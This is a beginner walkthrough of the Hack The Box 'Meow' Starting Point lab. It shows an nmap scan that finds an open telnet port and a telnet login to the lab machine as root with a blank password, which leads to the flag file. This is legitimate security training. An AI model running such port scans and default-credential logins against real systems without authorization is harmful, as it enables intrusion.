The aim of this walkthrough is to provide help with the Meow machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.
Question: What does the acronym VM stand for?
A simple internet search should suffice for this task.
Question: What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
Same as before, use the internet.
Question: What service do we use to form our VPN connection into HTB labs?
There are multiple documents on the Hack The Box website describing the various ways you can connect to the target machine.
Question: What is the abbreviated name for a ’tunnel interface’ in the output of your VPN boot-up sequence output?
One of the ways to figure that out, is to list all your network interfaces. You could do this with the ifconfig command.
Question: What tool do we use to test our connection to the target with an ICMP echo request?
Quick search on the internet should get you the answer.
Question: What is the name of the most common tool for finding open ports on a target?
Just like in the previous task, use the internet.
Question: What service do we identify on port 23/tcp during our scans?
Simply use nmap to scan the top 1000 ports on the target machine.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop] └──╼ $nmap 10.129.30.251 Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 09:06 BST Nmap scan report for 10.129.30.251 Host is up (0.064s latency). Not shown: 999 closed tcp ports (conn-refused) PORT STATE SERVICE 23/tcp open telnet Nmap done: 1 IP address (1 host up) scanned in 0.80 seconds ┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop] └──╼ $
Only one port seems to be open:
Question: What username is able to log into the target over telnet with a blank password?
We can use the telnet command to connect to the service. Once connected, try out some common username:password pairs.
The first I tried user:password was a bust, but for the second, root:root, I did not even have to provide the password.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop] └──╼ $telnet 10.129.30.251 23 Trying 10.129.30.251... Connected to 10.129.30.251. Escape character is '^]'. █ █ ▐▌ ▄█▄ █ ▄▄▄▄ █▄▄█ ▀▀█ █▀▀ ▐▌▄▀ █ █▀█ █▀█ █▌▄█ ▄▀▀▄ ▀▄▀ █ █ █▄█ █▄▄ ▐█▀▄ █ █ █ █▄▄ █▌▄█ ▀▄▄▀ █▀█ Meow login: user Password: Login incorrect Meow login: root Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu 04 May 2023 08:16:35 AM UTC System load: 0.0 Usage of /: 41.7% of 7.75GB Memory usage: 4% Swap usage: 0% Processes: 138 Users logged in: 0 IPv4 address for eth0: 10.129.30.251 IPv6 address for eth0: dead:beef::250:56ff:fe96:247c * Super-optimized for small spaces - read how we shrank the memory footprint of MicroK8s to make it the smallest full K8s around. https://ubuntu.com/blog/microk8s-memory-optimisation 75 updates can be applied immediately. 31 of these updates are standard security updates. To see these additional updates run: apt list --upgradable The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Thu May 4 08:15:52 UTC 2023 on pts/0 root@Meow:~#
Question: Submit root flag
Once we logged in via telnet, we will find ourselves with root privileges and in the root home directory.
Simply listing all the files in your directory will reveal the flag. Grab it, to continue.
root@Meow:~# ll total 36 drwx------ 5 root root 4096 Jun 18 2021 ./ drwxr-xr-x 20 root root 4096 Jul 7 2021 ../ lrwxrwxrwx 1 root root 9 Jun 4 2021 .bash_history -> /dev/null -rw-r--r-- 1 root root 3132 Oct 6 2020 .bashrc drwx------ 2 root root 4096 Apr 21 2021 .cache/ -rw-r--r-- 1 root root 33 Jun 17 2021 flag.txt drwxr-xr-x 3 root root 4096 Apr 21 2021 .local/ -rw-r--r-- 1 root root 161 Dec 5 2019 .profile -rw-r--r-- 1 root root 75 Mar 26 2021 .selected_editor drwxr-xr-x 3 root root 4096 Apr 21 2021 snap/ root@Meow:~# cat flag.txt <flag> root@Meow:~#
Make sure to terminate the target box before you continue with the next machine!